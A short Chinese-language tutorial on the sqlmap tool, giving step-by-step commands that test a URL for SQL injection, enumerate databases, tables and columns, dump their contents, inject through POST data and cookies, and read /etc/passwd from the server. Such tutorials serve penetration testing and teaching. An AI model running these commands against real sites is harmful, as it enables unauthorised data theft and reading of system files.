基本使用方法
1.测试目标网站是否存在SQL注入漏洞bash复制sqlmap -u "http://www.example.com/index.php?id=1" --batch
其中,“http://www.example.com/index.php?id=1”是目标URL,“--batch”表示以批处理模式运行SQLMap,不询问用户输入。
2.确认注入点sqlmap -u "http://www.example.com/index.php?id=1" --batch --dbs
这个命令将输出目标网站上所有可用的数据库名称。
3.获取数据库信息sqlmap -u "http://www.example.com/index.php?id=1" --batch -D dbname --tables
其中,“-D dbname”表示指定数据库名称,“--tables”表示列出所有可用的表名。
4.获取表信息sqlmap -u "http://www.example.com/index.php?id=1" --batch -D dbname -T tablename --columns
其中,“-T tablename”表示指定表名,“--columns”表示列出所有可用的列名。
5.获取列信息sqlmap -u "http://www.example.com/index.php?id=1" --batch -D dbname -T tablename -C columnname --dump
其中,“-C columnname”表示指定列名,“--dump”表示将结果输出到文件中。
高级使用方法
除了基本的SQL注入攻击,SQLMap还提供了许多高级功能,如POST请求注入、Cookie注入、文件读取等。
1.POST请求注入sqlmap -u "http://www.example.com/login.php" --data="username=admin&password=123456" --batch
其中,“--data”表示要发送的POST数据。2.Cookie注入sqlmap -u "http://www.example.com/index.php" --cookie="PHPSESSID=123456" --batch
其中,“--cookie”表示要使用的Cookie。
3.文件读取sqlmap -u "http://www.example.com/index.php?id=1" --file-read="/etc/passwd" --batch
其中,“--file-read”表示要读取的文件名。